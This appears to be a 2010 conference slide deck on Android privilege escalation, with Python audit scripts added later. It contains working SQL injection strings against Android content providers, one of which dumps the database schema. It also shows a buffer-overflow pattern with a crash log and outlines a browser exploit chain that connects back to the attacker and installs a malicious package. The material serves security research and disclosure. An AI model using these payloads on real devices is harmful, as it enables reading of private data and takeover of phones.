
The Risk you carry in your Pocket

Nils

Black Hat Abu Dhabi 2010

MWR InfoSecurity


Who Am I?

• Head of Research @ MWR
• Exploiting stuff before…
  • Microsoft, Google, Adobe, IBM, Mozilla, Sun, Linux, Apple …
• Pwn2Own Winner 2009
  • Safari, IE and Firefox
• Pwn2Own Winner 2010
  • Firefox on Windows 7


• Demo
• Introduction
• Android Sandbox
• Android IPC
• Vulnerabilities
• Demo
• Conclusion
• Q&A


Introduction

• Prerequisites:
  • I have got a WebKit vulnerability
• Can own:
  • iPhone
  • Palm webOS
  • Android
• In Android I am limited to the Sandbox
  • Access to Passwords, Cookies, etc…


Introduction

• I want more Privileges
  • Record Audio


Introduction

• Research on an Android Phone
  • Not emulator
  • HTC Legend
  • Android 2.1
  • Some apps


What will you see?

• How to:
  • Audit an Android Handset
    • Additions by Vendors
    • And Carriers
  • Audit Android Applications
• And how to exploit the findings


Android – Previous Research

• Kernel vulnerabilities:
  • E.g. sock_sendpage()
• Local vulnerabilities:
  • E.g. adb root vulnerability
    • Fork bomb
    • setuid() return value not checked


Android – Sandbox

• Applications are Sandboxed
  • Using Linux User/Group model
  • Every Application == 1 User
  • In theory …
• Communication through IPC
  • Permissions


Android – Permissions

• Applications request Permissions
  • AndroidManifest.xml
• Pre-installed apps
  • Set up by default in phone
• User installed apps
  • Granted by User during installation
  • Limited


Android – Permissions

• Examples:
  • android.permission.CALL_PHONE
  • android.permission.RECORD_AUDIO
  • android.permission.INSTALL_PACKAGES


Android – IPC

• Inter-Process Communication
  • Used by all of the Apps
  • Core feature on Android
  • Protected using Permissions
• Mechanisms:
  • Services
  • Content-Providers
  • Broadcasts
  • Activities


Android – IPC

• Supported by /dev/binder
  • Kernel driver
  • Message routing
  • Permission enforcement builds on it: the driver attaches the caller's UID/PID to every transaction, and the framework checks permissions against them
• Messages in "Parcels"
  • Intents are sent as special Parcels


Android – Intent

• Serialised Data Structure
• Sent to IPC endpoints
• Contain Extras
  • Strings
  • Primitive Data Types
  • Arrays thereof
  • Serialisable Java Objects (!)


Android – Service

• Similar to RPC
• Class extends Service
• Public methods are exported
• Called through Intents
• Defined in AndroidManifest.xml:

    <service android:name="BluetoothHeadsetService">
        <intent-filter>
            <action android:name="android.bluetooth.IBluetoothHeadset" />
        </intent-filter>
    </service>


Android – Activity

• Visual Components of Applications
• Applications can instantiate them
• Sometimes
  • Take arguments in Intents
• Will run in Implementing Process
  • Permissions!


Android – Content-Providers

• Provide Access to any Data
  • Emails
  • Pictures
• Often backed by SQLite Databases
• Content-Resolver
  • URI: content://browser/bookmarks
  • Standard Interface using Cursors
• Write and Read Permissions
• Not using Intents


Android – Broadcast Receivers

• Register to Broadcast Messages
  • System and Custom
• Some Messages are protected
  • Others can be forged by anyone
• Arguments in Broadcasts
  • Intents
• AndroidManifest.xml
  • Can register dynamically as well


Android – Idea

(Diagram: App1, App2 and App3 talking to Service1 and Service2 over the four IPC endpoint types: Service, Content-Provider, Broadcast-Receiver, Activity.)


Android – IPC Exports

• Default IPC exports
  • Content-Providers: exported by default
  • Services, Broadcast Receivers, Activities: exported as soon as an intent-filter is set
• Developers aware of that?


Android – Privilege Escalation

• Any vulnerability in any exported:
  • Service, Content-Provider
  • Broadcast Receiver or Activity
• Can lead to privilege Escalation
  • Gaining privileges of vulnerable App
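The export rules on the two slides above are the first thing to check when auditing a handset. The script below is an added example, not code from the talk: it parses an AndroidManifest.xml with the Android 2.x export defaults the slides describe (providers exported unless told otherwise, the other three component types exported when they carry an intent-filter or set android:exported="true") and lists every exported component together with the permission guarding it. The embedded manifest, its package name com.example.recorder and its component names are constructed for illustration and are not taken from any real HTC or Android application.

```python
"""Audit an AndroidManifest.xml for IPC endpoints reachable by other apps.

Added example, not code from the talk. The manifest below is constructed;
package and component names are invented. Export rules follow the
Android 2.x behaviour described on the slides:
  - a <provider> is exported unless android:exported="false"
  - <activity>/<service>/<receiver> are exported when they declare an
    <intent-filter> (unless android:exported="false") or when they set
    android:exported="true" explicitly
An exported component with no permission attribute is callable by any
app on the device and runs with the vulnerable app's privileges.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"   # android: attribute namespace
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest (not a real HTC/Android manifest).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.recorder">
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application>
    <!-- explicitly exported, no permission: callable by any app -->
    <service android:name=".RecordingService" android:exported="true"/>
    <!-- implicitly exported via intent-filter, but guarded -->
    <receiver android:name=".BootReceiver"
              android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <!-- provider: exported by default on Android 2.x, read side unguarded -->
    <provider android:name=".NotesProvider"
              android:authorities="com.example.recorder.notes"
              android:writePermission="com.example.recorder.WRITE_NOTES"/>
    <!-- not exported: no intent-filter, no exported attribute -->
    <activity android:name=".SettingsActivity"/>
  </application>
</manifest>
"""


def is_exported(elem):
    """True if other packages can reach this component."""
    explicit = elem.get(A + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return True                     # pre-API-17 default for providers
    return elem.find("intent-filter") is not None


def component_permission(elem):
    """Permission guarding `elem`, or None when some access path is open."""
    perm = elem.get(A + "permission")
    if elem.tag != "provider" or perm:
        return perm
    read = elem.get(A + "readPermission")
    write = elem.get(A + "writePermission")
    if read and write:
        return "read=%s write=%s" % (read, write)
    return None                         # read or write side is unguarded


def audit_manifest(xml_text):
    """Return [(tag, fully qualified name, permission or None)] for exported components."""
    root = ET.fromstring(xml_text)
    pkg = root.get("package", "")
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    for elem in app:
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem):
            continue
        name = elem.get(A + "name", "")
        if name.startswith("."):
            name = pkg + name           # expand relative class names
        findings.append((elem.tag, name, component_permission(elem)))
    return findings


def unprotected_exports(xml_text):
    """Exported components with no permission: the slide's escalation targets."""
    return [(tag, name) for tag, name, perm in audit_manifest(xml_text) if perm is None]


if __name__ == "__main__":
    for tag, name, perm in audit_manifest(SAMPLE_MANIFEST):
        print("%-8s %-42s %s" % (tag, name, perm or "NO PERMISSION"))
```

Run against a real manifest (pulled from the device and decoded with apktool or aapt), anything printed as NO PERMISSION is an entry point that any installed app, or code running inside a compromised app such as the browser, can drive.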


Android – Applications

• Many Apps on the phone
  • All in different Processes (Theoretically)
• Default Android apps
  • ~ 70 apps
• Vendor apps
  • HTC: ~ 60 apps
  • Plus carrier apps!
• User installed apps
  • Many more


Android – Processes

• 1 User, 1 App
  • Multiple processes per App
  • Not on real phones though
• Shared User IDs
  • Across apps
• Shared processes
  • Across apps
• => Shared Permissions and Access rights


Android – Shared UIDs

• Applications can share User IDs
  • If signed by the same Developer Key
  • Or Pre-installed
• Pro:
  • Performance
• Contra:
  • Security


Android – Shared UIDs

• Example:
  • com.htc.WeatherWidget
• Permissions: android.permission.GET_ACCOUNTS, android.permission.READ_SYNC_SETTINGS


Android – Shared UIDs

• Example:
  • com.htc.WeatherWidget
• Shares "com.htc.rosie.uid.shared" with: com.htc.FriendStreamWidget, com.htc.TwitterWidget, com.htc.htcmailwidgets, com.htc.NewsReaderWidget, com.htc.StockWidget, com.htc.widget.clockwidget, com.htc.htccalendarwidgets, com.htc.footprints.widgets, com.htc.htccontactwidgets, com.htc.htcmsgwidgets, com.htc.htcsyncwidget, com.htc.launcher, com.htc.WeatherWidget, com.htc.htcsettingwidgets, com.htc.photo.widgets, com.htc.htcbookmarkwidget, com.htc.MusicWidget, com.htc.htcsearchwidgets


Android – Shared UIDs

• Example:
  • com.htc.WeatherWidget
• Shared (effective) Permissions: android.permission.INTERNET, com.htc.htctwitter.permission.useprovider, android.permission.ACCESS_FINE_LOCATION, android.permission.ACCESS_NETWORK_STATE, android.permission.ACCESS_WIFI_STATE, android.permission.GET_ACCOUNTS,

android.permission.READ_SYNC_SETTINGS, android.permission.READ_CALENDAR, android.permission.WRITE_CALENDAR,

com.google.android.googleapps.permission.GOOGLE_AUTH.mail, android.permission.READ_CONTACTS,

android.permission.CALL_PHONE, android.permission.CALL_PRIVILEGED, android.permission.READ_SMS, com.htc.socialnetwork.permission.useprovider, android.permission.RECEIVE_BOOT_COMPLETED, android.permission.WRITE_CONTACTS,

android.permission.RECEIVE_SMS, android.permission.RECEIVE_MMS, android.permission.SEND_SMS, android.permission.VIBRATE, android.permission.WRITE_SMS, android.permission.CHANGE_NETWORK_STATE, android.permission.READ_PHONE_STATE, android.permission.WAKE_LOCK, android.permission.EXPAND_STATUS_BAR, android.permission.GET_TASKS, android.permission.SET_WALLPAPER, android.permission.SET_WALLPAPER_HINTS, android.permission.WRITE_SETTINGS, com.htc.launcher.permission.READ_SETTINGS, com.htc.launcher.permission.WRITE_SETTINGS, android.permission.SET_TIME_ZONE, android.permission.READ_SYNC_STATS, android.permission.WRITE_EXTERNAL_STORAGE, android.permission.BROADCAST_STICKY,

android.permission.WRITE_SECURE_SETTINGS, android.permission.CHANGE_WIFI_STATE, android.permission.CLEAR_APP_USER_DATA, android.permission.MODIFY_PHONE_STATE, android.permission.ACCESS_COARSE_LOCATION, android.permission.WRITE_APN_SETTINGS, android.permission.ACCESS_CHECKIN_PROPERTIES, android.permission.BLUETOOTH, android.permission.BLUETOOTH_ADMIN, android.permission.ACCESS_WIMAX_STATE, android.permission.CHANGE_WIMAX_STATE, android.permission.ACCESS_LOCATION_EXTRA_COMMANDS, android.permission.ACCESS_LOCATION, android.permission.ACCESS_ASSISTED_GPS, android.permission.ACCESS_NETWORK_LOCATION, android.permission.ACCESS_GPS, com.android.browser.permission.READ_HISTORY_BOOKMARKS, com.android.browser.permission.WRITE_HISTORY_BOOKMARKS  
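The slides above make the shared-UID point with HTC's widget set: a weather widget that asks for two permissions runs with everything the launcher and the other widgets asked for. The script below is an added example, not code from the talk, that computes that union from a set of manifests. Android grants permissions per Linux UID, so packages declaring the same android:sharedUserId (accepted only when they are signed by the same key or pre-installed) receive the union of all their uses-permission entries. The three manifests are constructed in code; their package names (com.example.*) and permission sets are invented to mirror the slide and are not copied from HTC's packages.

```python
"""Effective permissions of apps that share a Linux UID.

Added example, not code from the talk or from Android. Permissions are
granted per UID, so every package with the same android:sharedUserId
runs with the union of the group's requested permissions. The manifests
below are constructed; package names and permissions are invented.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

A = "{http://schemas.android.com/apk/res/android}"   # android: attribute namespace


def manifest(package, shared_uid, permissions):
    """Build a minimal manifest string (constructed test input)."""
    uses = "".join('<uses-permission android:name="%s"/>' % p for p in permissions)
    shared = ' android:sharedUserId="%s"' % shared_uid if shared_uid else ""
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            'package="%s"%s>%s<application/></manifest>' % (package, shared, uses))


# Constructed: a small widget, a launcher sharing its UID, and an unrelated app.
SAMPLE_MANIFESTS = [
    manifest("com.example.weatherwidget", "com.example.uid.shared",
             ["android.permission.GET_ACCOUNTS", "android.permission.READ_SYNC_SETTINGS"]),
    manifest("com.example.launcher", "com.example.uid.shared",
             ["android.permission.INTERNET", "android.permission.READ_CONTACTS",
              "android.permission.CALL_PHONE", "android.permission.READ_SMS"]),
    manifest("com.example.standalone", None, ["android.permission.VIBRATE"]),
]


def parse_manifest(xml_text):
    """Return (package, uid key, declared permissions)."""
    root = ET.fromstring(xml_text)
    pkg = root.get("package")
    uid = root.get(A + "sharedUserId") or pkg      # own UID when not shared
    perms = {e.get(A + "name") for e in root.iter("uses-permission")}
    return pkg, uid, perms


def effective_permissions(manifests):
    """Map package -> (declared permissions, permissions its UID actually holds)."""
    by_uid = defaultdict(set)
    declared, uid_of = {}, {}
    for xml_text in manifests:
        pkg, uid, perms = parse_manifest(xml_text)
        declared[pkg], uid_of[pkg] = perms, uid
        by_uid[uid] |= perms                        # the union is what the kernel/framework see
    return {pkg: (declared[pkg], by_uid[uid_of[pkg]]) for pkg in declared}


def inherited_permissions(manifests, package):
    """Permissions `package` can exercise although it never requested them."""
    declared, effective = effective_permissions(manifests)[package]
    return sorted(effective - declared)


if __name__ == "__main__":
    for pkg, (declared, effective) in effective_permissions(SAMPLE_MANIFESTS).items():
        extra = inherited_permissions(SAMPLE_MANIFESTS, pkg)
        print("%-28s declared %2d, effective %2d, inherited: %s"
              % (pkg, len(declared), len(effective), ", ".join(extra) or "-"))
```

The review consequence is the one the slide draws: a bug in the smallest widget is a bug in a process holding CALL_PHONE and READ_SMS, so every member of a shared-UID group has to be audited to the standard of the most privileged one.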


Android – Vulnerabilities

• SQL injection in Content Providers
  • When backed by SQLite
• Allows for arbitrary reads in databases
  • Across processes
• Can be filtered by Developer
  • Usually is not
  • Not encouraged by Dev Docs
• Have not found instances of writes to DB
  • No useful functions (load_extension()…)


Android – SQL Injection

ContentResolver query signature:

    final Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder);


Android – SQL Injection

    final Cursor query("content://settings/system", null, null, null, null);

    SELECT * FROM system;


Android – SQL Injection

    final Cursor query("content://settings/system", null, "_id=1", null, null);

    SELECT * FROM system WHERE _id=1;


Android – SQL Injection

    final Cursor query("content://settings/system", null,
        "(select count(*) from secure where name='adb_enabled' and value='0')=0", null, null);

    SELECT * FROM system WHERE (select count(*) from secure where name='adb_enabled' and value='0')=0;

Rows come back only when adb_enabled is not '0': the selection turns a permitted read of the system table into a yes/no oracle on the secure table.


Android – SQL Injection

    final Cursor query("content://settings/system", {"_id"}, null, null, null);

    SELECT _id FROM system;


Android – SQL Injection

    final Cursor query("content://settings/system", {"* FROM bluetooth_devices;"}, null, null, null);

    SELECT * FROM bluetooth_devices; FROM system;


Android – SQL Injection

    final Cursor query("content://settings/system", {"* FROM sqlite_master;"}, null, null, null);

    SELECT * FROM sqlite_master; FROM system;
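The five query slides above show the same mechanism from both ends: the projection and selection strings a caller hands to query() are pasted into the SQL text. The block below is an added example, not code from the talk or from Android. It reproduces that string assembly in Python (build_query mirrors the shape of SQLiteQueryBuilder.buildQueryString, it is not the framework's code), loads a throwaway in-memory SQLite database with constructed system, secure and bluetooth_devices tables, and runs the slides' two payloads: the projection escape that reads sqlite_master, written here with a trailing `--` comment instead of the slide's `;` so the stray "FROM system" is neutralised in any SQLite build, and the boolean selection that infers adb_enabled from the secure table. safe_query is a hardening sketch of my own: a projection map like SQLiteQueryBuilder.setProjectionMap plus a selection restricted to a single bound parameter, which is stricter than what a generic provider can usually afford but shows where the checks belong.

```python
"""Projection/selection injection through a ContentProvider, modelled in Python.

Added example, not code from the talk or from Android. `build_query` has the
shape of SQLiteQueryBuilder.buildQueryString (plain string assembly);
`safe_query` is a hardening sketch, not Android's implementation. Tables
and rows are constructed.
"""
import re
import sqlite3


def make_settings_db():
    """In-memory stand-in for the settings provider's database (constructed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE system (_id INTEGER PRIMARY KEY, name TEXT, value TEXT);
        CREATE TABLE secure (_id INTEGER PRIMARY KEY, name TEXT, value TEXT);
        CREATE TABLE bluetooth_devices (_id INTEGER PRIMARY KEY, addr TEXT, name TEXT);
        INSERT INTO system (name, value) VALUES ('screen_brightness', '120');
        INSERT INTO secure (name, value) VALUES ('adb_enabled', '1');
        INSERT INTO bluetooth_devices (addr, name) VALUES ('00:11:22:33:44:55', 'headset');
    """)
    return db


def build_query(table, projection, selection):
    """Plain string assembly, as SQLiteQueryBuilder.buildQueryString does."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM %s" % (cols, table)
    if selection:
        sql += " WHERE %s" % selection
    return sql


def vulnerable_query(db, table, projection, selection, selection_args=()):
    """The provider pattern from the slides: caller strings reach SQL unfiltered."""
    return db.execute(build_query(table, projection, selection), selection_args).fetchall()


def dump_schema_via_projection(db):
    """Slide 40: escape the projection to read another table (sqlite_master)."""
    return vulnerable_query(db, "system", ["* FROM sqlite_master --"], None)


def infer_adb_enabled(db):
    """Slide 37: rows are returned from `system` only if secure.adb_enabled != '0'."""
    rows = vulnerable_query(db, "system", None,
        "(select count(*) from secure where name='adb_enabled' and value='0')=0")
    return len(rows) > 0


# --- hardening sketch -------------------------------------------------------
PROJECTION_MAP = {"_id": "_id", "name": "name", "value": "value"}   # caller name -> column
SIMPLE_SELECTION = re.compile(r"^\s*(\w+)\s*=\s*\?\s*$")            # only '<col> = ?'


def safe_query(db, table, projection, selection, selection_args=()):
    """Reject unknown columns and free-form selections; bind values as parameters."""
    cols = []
    for col in projection or PROJECTION_MAP:
        if col not in PROJECTION_MAP:
            raise ValueError("unknown column in projection: %r" % col)
        cols.append(PROJECTION_MAP[col])
    where = None
    if selection:
        m = SIMPLE_SELECTION.match(selection)
        if not m or m.group(1) not in PROJECTION_MAP:
            raise ValueError("selection must be '<column> = ?': %r" % selection)
        where = "%s = ?" % PROJECTION_MAP[m.group(1)]
    return db.execute(build_query(table, cols, where), selection_args).fetchall()


if __name__ == "__main__":
    db = make_settings_db()
    print("tables visible via projection:", [r[1] for r in dump_schema_via_projection(db)])
    print("adb_enabled inferred as:", infer_adb_enabled(db))
    print("safe lookup:", safe_query(db, "system", ["name"], "name = ?", ("screen_brightness",)))
```

The point the slides make and the code confirms: a provider that only exposes the system table still leaks every other table in the same database, because the permission check is on the URI while the injection lands on the whole SQLite file.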


Android – Vulnerabilities

• Unprotected services
• Example:
  • Introduced by HTC
  • com.htc.soundrecorder.RecordingService
  • Not protected
  • Explicitly exported
  • android.permission.RECORD_AUDIO
    • Now useless
  • Every HTC Android phone I checked


Android – Native APIs

• Java less prone to Memory Corruptions
• Native APIs more promising for Review
  • Services directly exporting native APIs
• Keep a look out for:
  • loadLibrary("")
  • And the "native" keyword


Android – Native APIs

Java side (the caller's String reaches native code unchecked):

    public boolean loadJetFile(String path) {
        return native_loadJetFromFile(path);
    }

Native side:

    char mJetFilePath[256];

    int JetPlayer::loadFromFile(const char* path)
    {
        …
        // length is taken from the source, not the 256-byte destination:
        // a path longer than 255 bytes overruns mJetFilePath
        strncpy(mJetFilePath, path, strlen(path));

Resulting crash log:

    I/DEBUG   (   31): pid: 1257, tid: 1258  >>> com.example.test1 <<<
    I/DEBUG   (   31): signal 11 (SIGSEGV), fault addr 00000000
    I/DEBUG   (   31):  r0 ffffffff  r1 41413000  r2 00000004  r3 ffff0ff0
    I/DEBUG   (   31):  r4 00000000  r5 41413000  r6 afd40328  r7 00000000
    I/DEBUG   (   31):  r8 00100000  r9 80848121  10 10000000  fp 00117808
    I/DEBUG   (   31):  ip afd20209  sp 100ffe20  lr afd20201  pc 80849aa4  cpsr 80000030
    I/DEBUG   (   31):          #00  pc 00049aa4  /system/lib/libdvm.so
    I/DEBUG   (   31):          #01  lr afd20201  /system/lib/libc.so


Android – Others

• Let's be creative
  • Applications do all kinds of stuff
  • Some of which is stupid :P
• Example: Skype App

    # ls -al /data/data/com.skype.raider/files/skypekit
    -rwxrwxrwx 1 0 2000 43 /data/data/com.skype.raider/files/skypekit

  • World-writable and executable: any other UID on the device can overwrite it


Android – Others

• Permissions: android.permission.DISABLE_KEYGUARD, android.permission.WAKE_LOCK, android.permission.INTERNET, android.permission.GET_ACCOUNTS, android.permission.READ_CONTACTS, android.permission.ACCESS_NETWORK_STATE, android.permission.VIBRATE, android.permission.MODIFY_AUDIO_SETTINGS, android.permission.RECORD_AUDIO, android.permission.READ_PHONE_STATE, android.permission.ACCESS_COARSE_LOCATION, android.permission.GET_TASKS, android.permission.AUTHENTICATE_ACCOUNTS, android.permission.MANAGE_ACCOUNTS, android.permission.READ_SYNC_SETTINGS, android.permission.WRITE_SYNC_SETTINGS, android.permission.GET_ACCOUNTS, android.permission.USE_CREDENTIALS, android.permission.WRITE_SETTINGS, android.permission.WRITE_SECURE_SETTINGS, android.permission.READ_CONTACTS, android.permission.WRITE_CONTACTS, android.permission.READ_SYNC_STATS, android.permission.WRITE_EXTERNAL_STORAGE
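The skypekit finding on the previous slide is a file-permission bug rather than an IPC bug, and it is found with a file-system walk rather than a manifest review. The scanner below is an added example, not code from the talk: it reports regular files that other UIDs can write to and flags the ones that are also executable, which is the combination that lets any app on the device swap in its own binary and have it run with the owning app's permissions (the list above, in Skype's case). On a device it would be pointed at /data/data; to run anywhere it builds a throwaway directory tree whose package names (com.example.*), file names and modes are constructed.

```python
"""Find files in app private directories that other UIDs can modify.

Added example, not code from the talk. Reproduces the check behind the
slide's `ls -al` finding (a mode-0777 executable under
/data/data/<package>/files). The sample tree is constructed.
"""
import os
import stat
import tempfile


def scan_world_writable(root):
    """Return sorted [(relative path, mode as octal string, executable?)] for
    regular files that have the other-write bit set."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            st = os.lstat(path)                  # lstat: do not follow symlinks
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
                findings.append((os.path.relpath(path, root),
                                 oct(stat.S_IMODE(st.st_mode)),
                                 bool(st.st_mode & exec_bits)))
    return sorted(findings)


def build_sample_tree():
    """Constructed stand-in for /data/data: one bad file and two sane ones."""
    root = tempfile.mkdtemp(prefix="data_data_")
    layout = {
        "com.example.voip/files/helperkit": 0o777,          # world-writable executable
        "com.example.voip/shared_prefs/settings.xml": 0o660,
        "com.example.notes/databases/notes.db": 0o660,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("sample\n")
        os.chmod(path, mode)                     # chmod ignores umask, so modes stick
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, mode, executable in scan_world_writable(root):
        print("%s %s%s" % (mode, rel, "  (executable: code replacement possible)" if executable else ""))
```

The equivalent one-liner on a rooted device is `find /data/data -type f -perm -o+w`; the value of the scripted version is the executable flag, which separates a sloppy preferences file from a binary the owning app will later run.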


Android – Deserialisation

• Intents contain Extras
  • Can be Serialisable
• Object type is checked after deserialisation
  • Arbitrary objects can be deserialised
  • In other Processes
  • Across trust boundaries
  • With other permissions
• Is this exploitable?
  • Sami?


Android – Permissions

• Most useful Permission: INSTALL_PACKAGES
• On HTC phones granted to the Browser
  • That's True!
• Why
  • Flash Lite Flash player
  • Installs updates using PackageManager
  • Needs Permissions for that …


Android – Permissions

• INSTALL_PACKAGES in Browser
• Impact
  • Malicious Code in Browser
  • Installs arbitrary Applications
    • Without prompting the User
  • Gains arbitrary Permissions
    • For malicious applications
    • No restricted permissions


Android – Demo

•  That should be enough…

Demo Time!


Android Demo - Vulnerability

• Use-after-free in Browser
  • WebKit
    • Android, Chrome, Safari, iPhone, Symbian, Palm Pre and more
  • Allows for arbitrary code execution
  • HTML5
  • Introduced in Android 2.0
    • 1.5 and 1.6 not vulnerable
  • JavaScript
  • Patched in 2.2
• No NX, No ASLR

Android - Use-after-free in Browser

(Diagram sequence: a DOM Object alongside Object 1 and Object 2; Object 2 is freed while still referenced; attacker-controlled data is allocated into the freed slot; the stale reference is then used as a function pointer, (*data)(), redirecting execution into that data.)


Android - Shellcode

• Steps:
  1. Connect back to Attacker
  2. Upload malicious APK
  3. Install from Browser
  4. Pwnage!


Android - Demo


Android Proof-of-Concept

• Reported the vulnerability to vendors
  • Patched in 2.2
• However
  • Any WebKit vulnerability will do
  • Not patched in most Phones


Conclusion

• Understand the Threats
• Android Sandbox
  • Fairly Reasonable
• Many bugs introduced by:
  • Vendors, Carriers
  • 3rd Party Apps
• Testing and Assurance
  • For Phones
  • Not just OS


Questions?